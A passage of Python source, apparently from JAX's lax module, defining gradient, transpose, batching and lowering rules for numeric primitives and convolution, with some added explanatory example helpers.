[_float, _float], 'igammac',
translation_rule=_broadcast_translate(partial(standard_translate, 'igammac')))
def igammac_gradx(g, a, x):
return -igamma_gradx(g, a, x)
def igammac_grada(g, a, x):
return -igamma_grada(g, a, x)
ad.defjvp(igammac_p, igammac_grada, igammac_gradx)
random_gamma_grad_p = standard_naryop([_float, _float], 'random_gamma_grad',
translation_rule=_broadcast_translate(partial(standard_translate,
'random_gamma_grad')))
bessel_i0e_p = standard_unop(_float, 'bessel_i0e')
ad.defjvp2(bessel_i0e_p, lambda g, y, x: g * (bessel_i1e(x) - sign(x) * y))
bessel_i1e_p = standard_unop(_float, 'bessel_i1e')
def _bessel_i1e_jvp(g, y, x):
eps = dtypes.finfo(_dtype(x)).eps
x_is_not_tiny = abs(x) > eps
safe_x = select(x_is_not_tiny, x, full_like(x, eps))
dy_dx = bessel_i0e(safe_x) - y * (sign(safe_x) + reciprocal(safe_x))
dy_dx = select(x_is_not_tiny, dy_dx, full_like(x, 0.5))
return g * dy_dx
ad.defjvp2(bessel_i1e_p, _bessel_i1e_jvp)
erf_p = standard_unop(_float, 'erf')
ad.defjvp(erf_p, lambda g, x: mul(_const(x, 2. / np.sqrt(np.pi)),
mul(g, exp(neg(square(x))))))
erfc_p = standard_unop(_float, 'erfc')
ad.defjvp(erfc_p, lambda g, x: mul(_const(x, 2. / np.sqrt(np.pi)),
mul(neg(g), exp(neg(square(x))))))
erf_inv_p = standard_unop(_float, 'erf_inv')
ad.defjvp2(erf_inv_p, lambda g, ans, x: mul(_const(x, np.sqrt(np.pi) / 2.),
mul(g, exp(square(ans)))))
real_p = unop(_complex_basetype, _complex, 'real')
ad.deflinear2(real_p, lambda t, _: [complex(t, np.zeros((), _dtype(t)))])
imag_p = unop(_complex_basetype, _complex, 'imag')
ad.deflinear2(imag_p, lambda t, _: [complex(np.zeros((), _dtype(t)), neg(t))])
_complex_dtype = lambda dtype, *args: (np.zeros((), dtype) + np.zeros((), np.complex64)).dtype
complex_p = naryop(_complex_dtype, [_complex_elem_types, _complex_elem_types],
'complex')
ad.deflinear2(complex_p, lambda t, *args: [real(t), imag(neg(t))])
conj_p = unop(_complex_dtype, _complex_elem_types | _complex, 'conj')
def _conj_transpose_rule(t, x, *, input_dtype):
assert ad.is_undefined_primal(x)
if dtypes.issubdtype(input_dtype, np.complexfloating):
return [conj(t)]
else:
return [real(t)]
xla.translations[conj_p] = lambda c, x, **kwargs: xops.Conj(x)
ad.primitive_jvps[conj_p] = partial(ad.linear_jvp, conj_p)
ad.primitive_transposes[conj_p] = _conj_transpose_rule
abs_p = unop(_complex_basetype, _num, 'abs')
def _abs_jvp_rule(g, ans, x):
if _iscomplex(x):
return _maybe_real(mul(g, div(_maybe_conj(x),
_replace_zero(convert_element_type(ans, _dtype(x))))))
else:
return select(ge(x, _zero(x)), g, neg(g))
ad.defjvp2(abs_p, _abs_jvp_rule)
_maybe_conj = lambda x: conj(x) if _iscomplex(x) else x
_maybe_real = lambda x: real(x) if _iscomplex(x) else x
sqrt_p = standard_unop(_float | _complex, 'sqrt')
ad.defjvp2(sqrt_p, lambda g, ans, x: mul(g, div(_const(x, 0.5), ans)))
rsqrt_p = standard_unop(_float | _complex, 'rsqrt')
ad.defjvp2(rsqrt_p,
lambda g, ans, x:
mul(g, mul(_const(x, -0.5), pow(x, _const(x, -1.5)))))
pow_p = standard_naryop([_float | _complex, _float | _complex], 'pow')
def _pow_jvp_lhs(g, ans, x, y):
jac = mul(y, pow(x, select(eq(y, _zeros(y)), _ones(y), sub(y, _ones(y)))))
return mul(_brcast(g, y), jac)
def _pow_jvp_rhs(g, ans, x, y):
return mul(_brcast(g, x), mul(log(_replace_zero(x)), ans))
ad.defjvp2(pow_p, _pow_jvp_lhs, _pow_jvp_rhs)
def _integer_pow_dtype_rule(x, *, y):
dtype = unop_dtype_rule(_identity, _int | _float | _complex, 'integer_pow', x)
if y < 0 and dtypes.issubdtype(dtype, np.integer):
raise TypeError("Integers cannot be raised to negative powers, got "
f"integer_pow({x}, {y})")
return dtype
def _integer_pow_translation_rule(c, x, *, y):
if y == 0:
shape = c.get_shape(x)
one = xb.constant(c, np.array(1, dtype=shape.numpy_dtype()))
return xops.Broadcast(one, shape.dimensions())
is_reciprocal = y < 0
if is_reciprocal:
y = -y
acc = None
while y > 0:
if y & 1:
acc = x if acc is None else xops.Mul(acc, x)
y >>= 1
if y > 0:
x = xops.Mul(x, x)
return xops.Reciprocal(acc) if is_reciprocal else acc
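# Illustrative sketch (not part of the library): the loop above is ordinary
# exponentiation by squaring, emitting O(log2(y)) multiplies instead of y - 1.
# A hypothetical pure-Python version of the same accumulation for positive y:
def _example_pow_by_squaring(x, y):
  assert y > 0
  acc = None
  while y > 0:
    if y & 1:                      # fold the current power of x into the result
      acc = x if acc is None else acc * x
    y >>= 1
    if y > 0:
      x = x * x                    # square the base for the next binary digit
  return acc
# e.g. _example_pow_by_squaring(3, 5) == 243 using three multiplies
# (3*3, 9*9, 3*81) rather than the naive four.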
def _integer_pow_jvp(g, x, *, y):
return _zeros(g) if y == 0 else mul(g, mul(_const(x, y), integer_pow(x, y - 1)))
integer_pow_p = standard_primitive(
_attrgetter('shape'), _integer_pow_dtype_rule, 'integer_pow',
translation_rule=_integer_pow_translation_rule)
batching.defvectorized(integer_pow_p)
masking.defvectorized(integer_pow_p)
ad.defjvp(integer_pow_p, _integer_pow_jvp)
_replace_zero = lambda x: select(eq(x, _const(x, 0)), _ones(x), x)
not_p = standard_unop(_bool_or_int, 'not')
ad.defjvp_zero(not_p)
and_p = standard_naryop([_bool_or_int, _bool_or_int], 'and')
ad.defjvp_zero(and_p)
or_p = standard_naryop([_bool_or_int, _bool_or_int], 'or')
ad.defjvp_zero(or_p)
xor_p = standard_naryop([_bool_or_int, _bool_or_int], 'xor')
ad.defjvp_zero(xor_p)
population_count_p = standard_unop(_int, 'population_count')
def _add_transpose(t, x, y):
# The following linearity assertion is morally true, but because in some cases we
# instantiate zeros for convenience, it doesn't always hold.
# assert ad.is_undefined_primal(x) and ad.is_undefined_primal(y)
return [t, t]
add_p = standard_naryop([_num, _num], 'add')
ad.defjvp(add_p, lambda g, x, y: _brcast(g, y), lambda g, x, y: _brcast(g, x))
ad.primitive_transposes[add_p] = _add_transpose
def _add_inverse(r, x, y):
xr = r - y
yr = r - x
return xr, yr
iad.definverse(add_p, _add_inverse)
def _sub_transpose(t, x, y):
# The following linearity assertion is morally true, but because in some cases
# we instantiate zeros for convenience, it doesn't always hold.
# TODO(mattjj): re-enable this assertion, don't return None below
# assert ad.is_undefined_primal(x) and ad.is_undefined_primal(y)
if type(t) is ad_util.Zero:
x_bar = ad_util.Zero(x.aval) if ad.is_undefined_primal(x) else None
y_bar = ad_util.Zero(y.aval) if ad.is_undefined_primal(y) else None
return [x_bar, y_bar]
else:
return [t, neg(t)]
sub_p = standard_naryop([_num, _num], 'sub')
ad.defjvp(sub_p,
lambda g, x, y: _brcast(g, y),
lambda g, x, y: _brcast(neg(g), x))
ad.primitive_transposes[sub_p] = _sub_transpose
mul_p = standard_naryop([_num, _num], 'mul')
ad.defbilinear_broadcasting(_brcast, mul_p, mul, mul)
def _mul_inverse(r, x, y):
xr = r / y
yr = r / x
return xr, yr
iad.definverse(mul_p, _mul_inverse)
def _div_transpose_rule(cotangent, x, y):
assert ad.is_undefined_primal(x) and not ad.is_undefined_primal(y)
res = ad_util.Zero(x.aval) if type(cotangent) is ad_util.Zero else div(cotangent, y)
return res, None
div_p = standard_naryop([_num, _num], 'div')
ad.defjvp(div_p,
lambda g, x, y: div(_brcast(g, y), y),
lambda g, x, y: mul(mul(neg(_brcast(g, x)), x), integer_pow(y, -2)))
ad.primitive_transposes[div_p] = _div_transpose_rule
rem_p = standard_naryop([_num, _num], 'rem')
ad.defjvp(rem_p,
lambda g, x, y: _brcast(g, y),
lambda g, x, y: mul(_brcast(neg(g), x), floor(div(x, y))))
def _broadcasting_select(c, which, x, y):
"""Wrapper around XLA `Select` that broadcasts its arguments."""
which_shape, x_shape, y_shape = (
c.get_shape(t).dimensions() for t in (which, x, y))
out_shape = broadcast_shapes(which_shape, x_shape, y_shape)
bcast_dims = lambda shape: tuple(range(len(out_shape) - len(shape),
len(out_shape)))
which = xops.BroadcastInDim(which, out_shape, bcast_dims(which_shape))
x = xops.BroadcastInDim(x, out_shape, bcast_dims(x_shape))
y = xops.BroadcastInDim(y, out_shape, bcast_dims(y_shape))
return xops.Select(which, x, y)
def _minmax_translation_rule(c, x, y, *, minmax=None, cmp=None):
dtype = c.get_shape(x).numpy_dtype()
if dtypes.issubdtype(dtype, np.complexfloating):
rx = xops.Real(x)
ry = xops.Real(y)
return _broadcasting_select(
c, xops.Select(xops.Eq(rx, ry), cmp(xops.Imag(x), xops.Imag(y)),
cmp(rx, ry)),
x, y)
return minmax(x, y)
max_p: core.Primitive = standard_naryop(
[_any, _any], 'max', translation_rule=partial(
_minmax_translation_rule, minmax=xops.Max, cmp=xops.Gt))
ad.defjvp2(max_p,
lambda g, ans, x, y: mul(_brcast(g, y), _balanced_eq(x, ans, y)),
lambda g, ans, x, y: mul(_brcast(g, x), _balanced_eq(y, ans, x)))
min_p: core.Primitive = standard_naryop(
[_any, _any], 'min', translation_rule=partial(
_minmax_translation_rule, minmax=xops.Min, cmp=xops.Lt))
ad.defjvp2(min_p,
lambda g, ans, x, y: mul(_brcast(g, y), _balanced_eq(x, ans, y)),
lambda g, ans, x, y: mul(_brcast(g, x), _balanced_eq(y, ans, x)))
shift_left_p = standard_naryop([_int, _int], 'shift_left')
ad.defjvp_zero(shift_left_p)
shift_right_arithmetic_p = standard_naryop([_int, _int], 'shift_right_arithmetic')
ad.defjvp_zero(shift_right_arithmetic_p)
shift_right_logical_p = standard_naryop([_int, _int], 'shift_right_logical')
ad.defjvp_zero(shift_right_logical_p)
eq_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'eq')
ad.defjvp_zero(eq_p)
ne_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'ne')
ad.defjvp_zero(ne_p)
ge_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'ge')
ad.defjvp_zero(ge_p)
gt_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'gt')
ad.defjvp_zero(gt_p)
le_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'le')
ad.defjvp_zero(le_p)
lt_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'lt')
ad.defjvp_zero(lt_p)
def _convert_element_type_shape_rule(operand, *, new_dtype, weak_type):
return operand.shape
def _convert_element_type_dtype_rule(operand, *, new_dtype, weak_type):
return new_dtype
def _convert_element_type_weak_type_rule(operand, *, new_dtype, weak_type):
return weak_type
def _convert_element_type_translation_rule(c, operand, *, new_dtype, weak_type):
old_dtype = c.get_shape(operand).numpy_dtype()
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = xops.Real(operand)
new_etype = xla_client.dtype_to_etype(new_dtype)
return xops.ConvertElementType(operand, new_element_type=new_etype)
def _convert_element_type_transpose_rule(ct, operand, *, new_dtype, weak_type):
assert ad.is_undefined_primal(operand)
old_dtype = operand.aval.dtype
old_weak_type = dtypes.is_weakly_typed(operand)
if type(ct) is ad_util.Zero:
return [ad_util.Zero(operand.aval)]
elif core.primal_dtype_to_tangent_dtype(old_dtype) is dtypes.float0:
return [ad_util.Zero(operand.aval.update(dtype=dtypes.float0, weak_type=False))]
else:
return [convert_element_type_p.bind(ct, new_dtype=old_dtype, weak_type=old_weak_type)]
def _convert_element_type_jvp_rule(tangent, operand, *, new_dtype, weak_type):
if core.primal_dtype_to_tangent_dtype(new_dtype) is dtypes.float0:
return ad_util.Zero(tangent.aval.update(dtype=dtypes.float0, weak_type=False))
else:
return convert_element_type_p.bind(tangent, new_dtype=new_dtype, weak_type=weak_type)
convert_element_type_p = standard_primitive(
_convert_element_type_shape_rule, _convert_element_type_dtype_rule,
'convert_element_type', _convert_element_type_translation_rule,
weak_type_rule=_convert_element_type_weak_type_rule)
ad.defjvp(convert_element_type_p, _convert_element_type_jvp_rule)
ad.primitive_transposes[convert_element_type_p] = _convert_element_type_transpose_rule
batching.defvectorized(convert_element_type_p)
masking.defvectorized(convert_element_type_p)
def _bitcast_convert_type_shape_rule(operand, *, new_dtype):
return operand.shape
def _bitcast_convert_type_dtype_rule(operand, *, new_dtype):
return new_dtype
def _bitcast_convert_type_translation_rule(c, operand, *, new_dtype):
new_etype = xla_bridge.dtype_to_etype(new_dtype)
return xops.BitcastConvertType(operand, new_element_type=new_etype)
bitcast_convert_type_p = standard_primitive(
_bitcast_convert_type_shape_rule, _bitcast_convert_type_dtype_rule,
'bitcast_convert_type', _bitcast_convert_type_translation_rule,
weak_type_rule=_strip_weak_type)
ad.defjvp_zero(bitcast_convert_type_p)
batching.defvectorized(bitcast_convert_type_p)
masking.defvectorized(bitcast_convert_type_p)
def _conv_general_dilated_shape_rule(
lhs: ShapedArray, rhs: ShapedArray, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, **unused_kwargs) -> Tuple[int, ...]:
assert type(dimension_numbers) is ConvDimensionNumbers
if len(lhs.shape) != len(rhs.shape):
msg = ("conv_general_dilated lhs and rhs must have the same number of "
"dimensions, but got {} and {}.")
raise ValueError(msg.format(lhs.shape, rhs.shape))
if not feature_group_count > 0:
msg = ("conv_general_dilated feature_group_count "
"must be a positive integer, got {}.")
raise ValueError(msg.format(feature_group_count))
lhs_feature_count = lhs.shape[dimension_numbers.lhs_spec[1]]
quot, rem = divmod(lhs_feature_count, feature_group_count)
if rem:
msg = ("conv_general_dilated feature_group_count must divide lhs feature "
"dimension size, but {} does not divide {}.")
raise ValueError(msg.format(feature_group_count, lhs_feature_count))
if quot != rhs.shape[dimension_numbers.rhs_spec[1]]:
msg = ("conv_general_dilated lhs feature dimension size divided by "
"feature_group_count must equal the rhs input feature dimension "
"size, but {} // {} != {}.")
raise ValueError(msg.format(lhs_feature_count, feature_group_count,
rhs.shape[dimension_numbers.rhs_spec[1]]))
if rhs.shape[dimension_numbers.rhs_spec[0]] % feature_group_count:
msg = ("conv_general_dilated rhs output feature dimension size must be a "
"multiple of feature_group_count, but {} is not a multiple of {}.")
raise ValueError(msg.format(rhs.shape[dimension_numbers.rhs_spec[0]],
feature_group_count))
if not batch_group_count > 0:
msg = ("conv_general_dilated batch_group_count "
"must be a positive integer, got {}.")
raise ValueError(msg.format(batch_group_count))
lhs_batch_count = lhs.shape[dimension_numbers.lhs_spec[0]]
if lhs_batch_count % batch_group_count != 0:
msg = ("conv_general_dilated batch_group_count must divide lhs batch "
"dimension size, but {} does not divide {}.")
raise ValueError(msg.format(batch_group_count, lhs_batch_count))
if rhs.shape[dimension_numbers.rhs_spec[0]] % batch_group_count:
msg = ("conv_general_dilated rhs output feature dimension size must be a "
"multiple of batch_group_count, but {} is not a multiple of {}.")
raise ValueError(msg.format(rhs.shape[dimension_numbers.rhs_spec[0]],
batch_group_count))
if batch_group_count > 1 and feature_group_count > 1:
msg = ("At most one of batch_group_count and feature_group_count may be > "
"1, got batch_group_count={} and feature_group_count={}")
raise ValueError(msg.format(batch_group_count, feature_group_count))
if len(_conv_sdims(dimension_numbers.rhs_spec)) != len(window_strides):
msg = ("conv_general_dilated window and window_strides must have "
"the same number of dimensions, but got {} and {}")
raise ValueError(
msg.format(len(_conv_sdims(dimension_numbers.rhs_spec)), len(window_strides)))
lhs_perm, rhs_perm, out_perm = dimension_numbers
lhs_trans = _dilate_shape(np.take(lhs.shape, lhs_perm), lhs_dilation)
rhs_trans = _dilate_shape(np.take(rhs.shape, rhs_perm), rhs_dilation)
out_trans = conv_shape_tuple(lhs_trans, rhs_trans, window_strides, padding,
batch_group_count)
return tuple(np.take(out_trans, np.argsort(out_perm))) # type: ignore[arg-type]
def _conv_general_dilated_dtype_rule(
lhs, rhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, **unused_kwargs):
return naryop_dtype_rule(_input_dtype, [_float | _complex, _float | _complex],
'conv_general_dilated', lhs, rhs)
_conv_spec_transpose = lambda spec: (spec[1], spec[0]) + spec[2:]
_conv_sdims = lambda spec: spec[2:]
# Understanding the convolution transpose rules:
# Ignoring the spatial dimensions, let m = batch, j = input feature,
# k = output feature.
#
# Convolution computes the following contraction:
# Forward: [m, j] [j, k] -> [m, k]
#
# The transposes are similar to the rules for transposing a matmul:
# LHS transpose: [m, k] [k, j] -> [m, j]
# RHS transpose: [j, m] [m, k] -> [j, k]
#
# With feature grouping, we have the following signatures:
# Forward: [m, gj] [j, gk] -> [m, gk]
# LHS transpose: [m, gk] [k, gj] -> [m, gj]
# --> implemented as feature grouping after transposing the group from the
# kernel input features to the kernel output features.
# RHS transpose: [gj, m] [m, gk] -> [j, gk]
# --> which is batch grouping.
#
# With batch grouping, we have the following signatures:
# Forward: [gm, j] [j, gk] -> [m, gk]
# LHS transpose: [m, gk] [gk, j] -> [gm, j]
# --> implemented as feature grouping with transposing the group on the kernel
# and the output.
# RHS transpose: [j, gm] [m, gk] -> [j, gk]
# --> which is feature grouping.
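# Illustrative sketch (not part of the library): the matmul analogy above,
# spelled out with hypothetical NumPy arrays where g plays the output cotangent.
def _example_matmul_transposes():
  import numpy as np
  rng = np.random.RandomState(0)
  x = rng.randn(4, 3)    # [m, j]
  w = rng.randn(3, 5)    # [j, k]
  g = rng.randn(4, 5)    # output cotangent, [m, k]
  dx = g @ w.T           # LHS transpose: [m, k] [k, j] -> [m, j]
  dw = x.T @ g           # RHS transpose: [j, m] [m, k] -> [j, k]
  assert dx.shape == x.shape and dw.shape == w.shape
  return dx, dw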
def _conv_general_dilated_transpose_lhs(
g, rhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
lhs_shape, rhs_shape, precision):
assert type(dimension_numbers) is ConvDimensionNumbers
assert batch_group_count == 1 or feature_group_count == 1
lhs_sdims, rhs_sdims, out_sdims = map(_conv_sdims, dimension_numbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
t_rhs_spec = _conv_spec_transpose(rhs_spec)
if feature_group_count > 1:
# in addition to switching the dims in the spec, need to move the feature
# group axis into the transposed rhs's output feature dim
rhs = _reshape_axis_out_of(rhs_spec[0], feature_group_count, rhs)
rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[1], rhs)
elif batch_group_count > 1:
rhs = _reshape_axis_out_of(rhs_spec[0], batch_group_count, rhs)
rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[1], rhs)
feature_group_count = batch_group_count
trans_dimension_numbers = ConvDimensionNumbers(out_spec, t_rhs_spec, lhs_spec)
padding = _conv_general_vjp_lhs_padding(
np.take(lhs_shape, lhs_sdims), np.take(rhs_shape, rhs_sdims),
window_strides, np.take(g.shape, out_sdims), padding, lhs_dilation,
rhs_dilation)
revd_weights = rev(rhs, rhs_sdims)
out = conv_general_dilated(
g, revd_weights, window_strides=lhs_dilation, padding=padding,
lhs_dilation=window_strides, rhs_dilation=rhs_dilation,
dimension_numbers=trans_dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=1, precision=precision)
if batch_group_count > 1:
out = _reshape_axis_out_of(lhs_spec[1], batch_group_count, out)
out = _reshape_axis_into(lhs_spec[1], lhs_spec[0], out)
return out
def _conv_general_dilated_transpose_rhs(
g, lhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers: ConvDimensionNumbers, feature_group_count: int,
batch_group_count: int, lhs_shape, rhs_shape, precision):
assert type(dimension_numbers) is ConvDimensionNumbers
if np.size(g) == 0:
# Avoids forming degenerate convolutions where the RHS has spatial size 0.
# Awkwardly, we don't have an aval for the rhs readily available, so instead
# of returning an ad_util.Zero instance here, representing a symbolic zero
# value, we instead return a None, which is meant to represent having no
# cotangent at all (and is thus incorrect for this situation), since the two
# are treated the same operationally.
# TODO(mattjj): adjust defbilinear so that the rhs aval is available here
return None
lhs_sdims, rhs_sdims, out_sdims = map(_conv_sdims, dimension_numbers)
lhs_trans, rhs_trans, out_trans = map(_conv_spec_transpose, dimension_numbers)
assert batch_group_count == 1 or feature_group_count == 1
if batch_group_count > 1:
feature_group_count = batch_group_count
batch_group_count = 1
elif feature_group_count > 1:
batch_group_count = feature_group_count
feature_group_count = 1
trans_dimension_numbers = ConvDimensionNumbers(lhs_trans, out_trans, rhs_trans)
padding = _conv_general_vjp_rhs_padding(
np.take(lhs_shape, lhs_sdims), np.take(rhs_shape, rhs_sdims),
window_strides, np.take(g.shape, out_sdims), padding, lhs_dilation,
rhs_dilation)
return conv_general_dilated(
lhs, g, window_strides=rhs_dilation, padding=padding,
lhs_dilation=lhs_dilation, rhs_dilation=window_strides,
dimension_numbers=trans_dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count, precision=precision)
def _conv_general_dilated_translation_rule(
c, lhs, rhs, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, precision, expand_complex_convolutions, **unused_kwargs):
assert type(dimension_numbers) is ConvDimensionNumbers
dimension_numbers = _conv_general_proto(dimension_numbers)
precision_config = _precision_config(precision)
dtype = c.get_shape(lhs).numpy_dtype()
conv = lambda x, y: xops.ConvGeneralDilated(
x, y, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
precision_config=precision_config)
if expand_complex_convolutions and np.issubdtype(dtype, np.complexfloating):
# We use a trick for complex multiplication due to Gauss which uses three
# multiplications and five additions, instead of the naive method's four
# multiplications and two additions.
# https://en.wikipedia.org/wiki/Multiplication_algorithm#Complex_multiplication_algorithm
#
# This performance win comes with a trade-off in accuracy, especially in
# cases where the real and imaginary parts differ greatly in magnitude. The
# relative error bound (e.g. 2**-24 for float32) holds relative to the
# maximum of the real and imaginary parts of the result, rather than for the
# real and imaginary parts independently of each other.
lhs_real, lhs_imag = xops.Real(lhs), xops.Imag(lhs)
rhs_real, rhs_imag = xops.Real(rhs), xops.Imag(rhs)
k1 = conv(xops.Add(lhs_real, lhs_imag), rhs_real)
k2 = conv(lhs_real, xops.Sub(rhs_imag, rhs_real))
k3 = conv(lhs_imag, xops.Add(rhs_real, rhs_imag))
return xops.Complex(xops.Sub(k1, k3), xops.Add(k1, k2))
return conv(lhs, rhs)
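# Illustrative sketch (not part of the library): the three-multiply complex
# product used above. With lhs = a and rhs = b, k1 = Re(b)*(Re(a)+Im(a)),
# k2 = Re(a)*(Im(b)-Re(b)), k3 = Im(a)*(Re(b)+Im(b)), and a*b = (k1-k3) + i(k1+k2).
# A hypothetical scalar NumPy check of that identity:
def _example_gauss_complex_product(a, b):
  import numpy as np
  k1 = b.real * (a.real + a.imag)
  k2 = a.real * (b.imag - b.real)
  k3 = a.imag * (b.real + b.imag)
  out = (k1 - k3) + 1j * (k1 + k2)
  assert np.allclose(out, a * b)
  return out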
def _conv_general_dilated_batch_rule(
batched_args, batch_dims, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count, precision, **unused_kwargs):
assert batch_group_count == 1 or feature_group_count == 1
lhs, rhs = batched_args
lhs_bdim, rhs_bdim = batch_dims
lhs_spec, rhs_spec, out_spec = dimension_numbers
if lhs_bdim is not None and rhs_bdim is not None:
assert lhs.shape[lhs_bdim] == rhs.shape[rhs_bdim]
if batch_group_count > 1:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[0], lhs)
batch_group_count *= lhs.shape[lhs_bdim]
else:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[1], lhs)
feature_group_count *= lhs.shape[lhs_bdim]
new_rhs = _reshape_axis_into(rhs_bdim, rhs_spec[0], rhs)
out = conv_general_dilated(
new_lhs, new_rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], lhs.shape[lhs_bdim], out)
return out, out_spec[1]
elif lhs_bdim is not None:
if batch_group_count == 1:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[0], lhs)
out = conv_general_dilated(new_lhs, rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, precision=precision)
out = _reshape_axis_out_of(out_spec[0], lhs.shape[lhs_bdim], out)
return out, out_spec[0]
else:
new_lhs = _reshape_axis_out_of(lhs_spec[0] + int(lhs_bdim <= lhs_spec[0]),
batch_group_count, lhs)
new_lhs = _reshape_axis_into(lhs_bdim + int(lhs_spec[0] < lhs_bdim),
lhs_spec[0] + 1,
new_lhs)
new_lhs = _reshape_axis_into(lhs_spec[0], lhs_spec[0], new_lhs)
out = conv_general_dilated(new_lhs, rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[0], lhs.shape[lhs_bdim], out)
return out, out_spec[0]
elif rhs_bdim is not None:
if feature_group_count == 1 and batch_group_count == 1:
new_rhs = _reshape_axis_into(rhs_bdim, rhs_spec[0], rhs)
out = conv_general_dilated(lhs, new_rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], rhs.shape[rhs_bdim], out)
return out, out_spec[1]
else:
# groups need to be outermost, so we need to factor them out of the
# rhs output feature dim, then factor the batch dim into the remaining rhs
# output feature dim, then put groups back in. We do something
# similar on the output. An alternative which would require more FLOPs but
# fewer reshapes would be to broadcast lhs.
group_count = (feature_group_count if feature_group_count > 1
else batch_group_count)
new_rhs = _reshape_axis_out_of(rhs_spec[0] + int(rhs_bdim <= rhs_spec[0]),
group_count, rhs)
new_rhs = _reshape_axis_into(rhs_bdim + int(rhs_spec[0] < rhs_bdim),
rhs_spec[0] + 1,
new_rhs)
new_rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[0], new_rhs)
out = conv_general_dilated(lhs, new_rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], group_count, out)
out = _reshape_axis_out_of(out_spec[1] + 1, rhs.shape[rhs_bdim], out)
out = _reshape_axis_into(out_spec[1], out_spec[1] + 1, out)
return out, out_spec[1]
def _masked(padded_value, logical_shape, dimensions, value=0):
"""
Sets all padding to the given value (default is 0) in the given dimensions.
All values outside the logical shape are considered padding.
"""
if len(dimensions) == 0:
return padded_value
masks = [broadcasted_iota(np.int32, padded_value.shape, d) < logical_shape[d]
for d in dimensions]
mask_intersection = masks[0]
for mask in masks[1:]:
mask_intersection &= mask
return select(mask_intersection, padded_value, full_like(padded_value, value))
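# Illustrative sketch (not part of the library): a hypothetical NumPy analogue
# of _masked for a single dimension. Entries at indices below the logical size
# are kept; everything past it is treated as padding and overwritten with value.
def _example_masked_1d(padded, logical_size, value=0):
  import numpy as np
  idx = np.arange(padded.shape[0])
  return np.where(idx < logical_size, padded, value)
# e.g. _example_masked_1d(np.array([1, 2, 3, 9, 9]), 3) -> array([1, 2, 3, 0, 0])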
def _conv_general_dilated_masking_rule(
padded_vals, logical_shapes, window_strides, padding, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count, batch_group_count,
lhs_shape, rhs_shape, precision):
lhs, rhs = padded_vals
logical_lhs_shape, logical_rhs_shape = logical_shapes
o, i, *window_dimensions = dimension_numbers.rhs_spec
assert (np.all(np.take(rhs.shape, window_dimensions)
== np.take(logical_rhs_shape, window_dimensions))), \
"Conv filter masking not yet implemented."
n, c, *padded_dimensions = dimension_numbers.lhs_spec
return conv_general_dilated(
_masked(lhs, logical_lhs_shape, padded_dimensions),
_masked(rhs, logical_rhs_shape, (i,)),
window_strides=window_strides, padding=padding,
lhs_dilation=lhs_dilation, rhs_dilation=rhs_dilation,
dimension_numbers=dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
precision=precision)
conv_general_dilated_p = standard_primitive(
_conv_general_dilated_shape_rule, _conv_general_dilated_dtype_rule,
'conv_general_dilated', partial(_conv_general_dilated_translation_rule,
expand_complex_convolutions=False))
# TODO(b/161124619, b/161126248): XLA does not support complex convolution on
# CPU or GPU; on these backends, lower complex convolutions away.
xla.backend_specific_translations['cpu'][conv_general_dilated_p] = partial(
_conv_general_dilated_translation_rule, expand_complex_convolutions=True)
xla.backend_specific_translations['gpu'][conv_general_dilated_p] = partial(
_conv_general_dilated_translation_rule, expand_complex_convolutions=True)
ad.defbilinear(conv_general_dilated_p,
_conv_general_dilated_transpose_lhs,
_conv_general_dilated_transpose_rhs)
batching.primitive_batchers[conv_general_dilated_p] = \
_conv_general_dilated_batch_rule
masking.masking_rules[conv_general_dilated_p] = \
_conv_general_dilated_masking_rule
def _reshape_axis_into(src, dst, x):
perm = [i for i in range(x.ndim) if i != src]
perm.insert(dst, src)
new_shape = list(np.delete(x.shape, src))
new_shape[dst] *= x.shape[src]
return reshape(x, new_shape, perm)
def _reshape_axis_out_of(src, size1, x):
shape = list(x.shape)
size2, ragged = divmod(shape[src], size1)
assert not ragged
shape[src:src+1] = [size1, size2]
return reshape(x, shape)
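# Illustrative sketch (not part of the library): what the two reshape helpers do
# to concrete, hypothetical shapes, written with NumPy stand-ins.
def _example_reshape_axis_helpers():
  import numpy as np
  x = np.zeros((4, 6, 5))
  # _reshape_axis_out_of(1, 2, x) splits axis 1 into a leading factor of 2:
  assert x.reshape(4, 2, 3, 5).shape == (4, 2, 3, 5)
  y = np.zeros((7, 2, 3, 5))
  # _reshape_axis_into(0, 1, y) folds axis 0 into position 1 of the remaining
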